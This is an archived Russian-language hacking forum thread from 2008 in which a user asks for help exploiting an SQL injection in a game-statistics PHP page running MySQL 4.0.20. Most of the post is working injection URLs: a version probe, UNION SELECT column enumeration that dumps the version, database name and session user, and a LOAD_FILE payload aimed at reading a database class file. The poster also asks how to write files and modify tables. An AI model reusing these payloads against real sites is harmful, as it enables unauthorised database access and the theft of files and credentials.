ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.04.2008, 06:44
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
!! My Sql Нужен совет
Скажите я могу читать или писать файлы на сервере MYSql 4 ветки:
http://192.168.2.100/stats/map.php?id=1+and+substring(version(),1,1)=4
выполняется
http://192.168.2.100/stats/map.php?id=1+limit+5+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat(version(),"%20",database(),"%20",SE SSION_USER()),13,14,15,16,17/*
как читать писать в файл зная дирикторию... но к сожелению не знаю права на папки.... и можноли тут изменять таблицу
Есть ли что то типа database() но выводящее где база находится я имею ввиду IP....
еще вот такая ситуация :
подобрал столбцы 12 столбец выводится как текст:
Код:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
а вот это выводит без ошибок но там где выводится 12 столбец пусто....
Код:
http://192.168.2.100/stats/map.php?id=1+limit+5+union+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,LOAD_FILE('/var/www/html/stats/includes/class_db.php'),13,14,15,16,17/*
так же заместо loadfile вставляю CASE+WHEN+(1=1)+THEN+'A'+ELSE+'B'+END работает выводит А
привожу дополнительные сведения о SQL:
версия sql 4.0.20
Имя юзера gamecs@localhost
имя базы ps_stats
как я понял из session_user то запросы выполняются под gamecs@localhost жду помощи от знающих людей... +++ |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид